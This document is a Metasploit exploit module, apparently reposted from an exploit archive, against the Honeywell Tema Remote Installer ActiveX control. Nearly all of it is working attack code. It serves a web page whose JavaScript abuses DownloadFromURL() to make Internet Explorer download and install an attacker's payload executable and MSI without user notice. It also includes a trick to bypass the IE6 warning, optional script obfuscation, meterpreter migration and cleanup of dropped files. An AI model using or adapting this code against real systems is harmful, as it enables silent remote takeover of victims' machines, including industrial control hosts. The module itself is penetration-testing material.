Remote Honeywell Tema Remote Installer ActiveX Remote

[DarckSol]

This Metasploit modules exploits a vulnerability found in the Honeywell Tema ActiveX Remote Installer. This ActiveX control can be abused by using the DownloadFromURL() function to install an arbitrary MSI from a remote location without checking source authenticity or user notification. This Metasploit module has been tested successfully with the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and Internet Explorer 6, 7 and 8 on Windows XP SP3.

[METASPLOIT]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	def initialize(info={})
  super(update_info(info,
  	'Name'           => "Honeywell Tema Remote Installer ActiveX Remote Code Execution",
  	'Description'    => %q{
    	This modules exploits a vulnerability found in the Honewell Tema ActiveX Remote
    Installer.  This ActiveX control can be abused by using the DownloadFromURL()
    function to install an arbitrary MSI from a remote location without checking source
    authenticity or user notification. This module has been tested successfully with
    the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and
    Internet Explorer 6, 7 and 8 on Windows XP SP3.
  	},
  	'License'        => MSF_LICENSE,
  	'Author'         =>
    [
    	'Billy Rios', # Vulnerability discovery
    	'Terry McCorkle', # Vulnerability discovery
    	'juan vazquez'  # Metasploit
    ],
  	'References'     =>
    [
    	[ 'OSVDB', '76681' ],
    	[ 'BID', '50078' ],
    	[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-11-285-01.pdf' ]
    ],
  	'Payload'        =>
    {
    	'Space'    => 2048,
    	'StackAdjustment' => -3500
    },
  	'DefaultOptions'  =>
    {
    	'EXITFUNC'         => "none",
    	'InitialAutoRunScript' => 'migrate -k -f'
    },
  	'Platform'       => 'win',
  	'Targets'        =>
    [
    	# HoneyWell EBI R410.1 - TEMA 5.3.0
    	# Tema_RemoteInstaller.ocx 1.0.0.0
    	[ 'Automatic', {} ]
    ],
  	'Privileged'     => false,
  	'DisclosureDate' => "Oct 20 2011",
  	'DefaultTarget'  => 0))

  register_options(
  	[
    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
  	], self.class)
	end

	def exploit
  @dropped_files = [
  	'payload.exe',
  	'ThinClient_TemaKit.msi',
  	'ThinClient_TemaKit.log'
  ]
  super
	end

	def on_new_session(session)
  if session.type == "meterpreter"
  	session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
  end

  @dropped_files.each do |file|
  	win_file = file.gsub("/", "\\\\")
  	if session.type == "meterpreter"
    begin
    	wintemp = session.fs.file.expand_path("%WINDIR%")
    	win_file = "#{wintemp}\\Temp\\#{win_file}"
    	# Meterpreter should do this automatically as part of
    	# fs.file.rm().  Until that has been implemented, remove the
    	# read-only flag with a command.
    	session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
    	session.fs.file.rm(win_file)
    	print_good("Deleted #{file}")
    	true
    rescue ::Rex::Post::Meterpreter::RequestError
    	print_error("Failed to delete #{win_file}")
    	false
    end

  	end
  end

	end

	def on_request_uri(cli, request)
  agent = request.headers['User-Agent']

  # Windows 7 isn't normally supported because the user won't have write access to the
  # %WINDIR%/Temp directory, where the downloaded components are stored.
  if not (agent =~ /MSIE \d/ and agent =~ /NT 5\.1/) and agent !~ /Tema_RemoteInstaller/
  	print_error("Browser not supported: #{agent.to_s}")
  	send_not_found(cli)
  	return
  end

  # exec_payload.msi needs it to be named payload.exe
  # atm there isn't msi generation on the fly
  if request.uri =~ /payload\.exe$/
  	return if ((p=regenerate_payload(cli))==nil)
  	data = generate_payload_exe({:code=>p.encoded})
  	print_status("Sending payload")
  	send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
  	return
  end

  if request.uri =~ /\.msi$/
  	msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
  	source = ::File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
  	print_status("Sending msi")
  	send_response(cli, source, {'Content-Type'=>'application/octet-stream'})
  	return
  end

  if agent =~ /MSIE 6/
  	# The 'setTimeout' trick allows to execute the installer on IE6 even if the user
  	# doesn't click the warning popup when downloading the payload.
  	# The ThinClient_TemaKit.msi installer name must be static.
  	# <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
  	js = <<-EOS
  	var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
  	setTimeout("obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');", 1000);
  	obj.DownloadFromURL('#{get_uri}/payload.exe');
  	EOS
  else
  	js = <<-EOS
  	var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
  	obj.DownloadFromURL('#{get_uri}/payload.exe');
  	obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');
  	EOS
  end

  js.gsub!(/\t\t\t/, "")

  if datastore['OBFUSCATE']
  	js = ::Rex::Exploitation::JSObfu.new(js)
  	js.obfuscate
  end

  html = <<-EOS
  <html>
  <body>
  </object>
  <script>
  #{js}
  </script>
  </body>
  </html>
  EOS

  print_status("Sending html")
  send_response(cli, html, {'Content-Type'=>'text/html'})

	end

end